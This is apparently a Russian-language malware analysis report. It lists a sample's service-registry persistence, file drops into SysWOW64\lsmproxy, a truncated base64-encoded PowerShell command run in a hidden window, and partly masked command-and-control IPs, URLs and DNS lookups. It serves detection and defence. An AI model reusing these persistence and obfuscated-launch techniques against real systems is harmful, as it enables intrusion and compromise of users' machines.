Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\EFS] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\where] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\where] 'ImagePath' = '"%WINDIR%\SysWOW64\lsmproxy\where.exe"'
- 'where' "%WINDIR%\SysWOW64\lsmproxy\where.exe"
- 'where' %WINDIR%\SysWOW64\lsmproxy\where.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAgADgANABaAEcAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAtAEYAIAAnAFMAeQBzACcALAAnAEQAJwAsACcAaQAnACwAJwBSACcALAAnAFQARQ...
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe в %WINDIR%\syswow64\lsmproxy\where.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- '19#.#02.229.74':80
- '11#.#9.11.81':7080
- '70.##.251.94':8080
- http://at###style.com/wp-admin/pB/
- http://70.##.251.94:8080/XscQOeorQbKx/ via 70.##.251.94
- DNS ASK at###style.com
- DNS ASK ni###angseo.com
- DNS ASK mr##ggy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAgADgANABaAEcAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAtAEYAIAAnAFMAeQBzACcALAAnAEQAJwAsACcAaQAnACwAJwBSACcALAAnAFQARQ...' (со скрытым окном)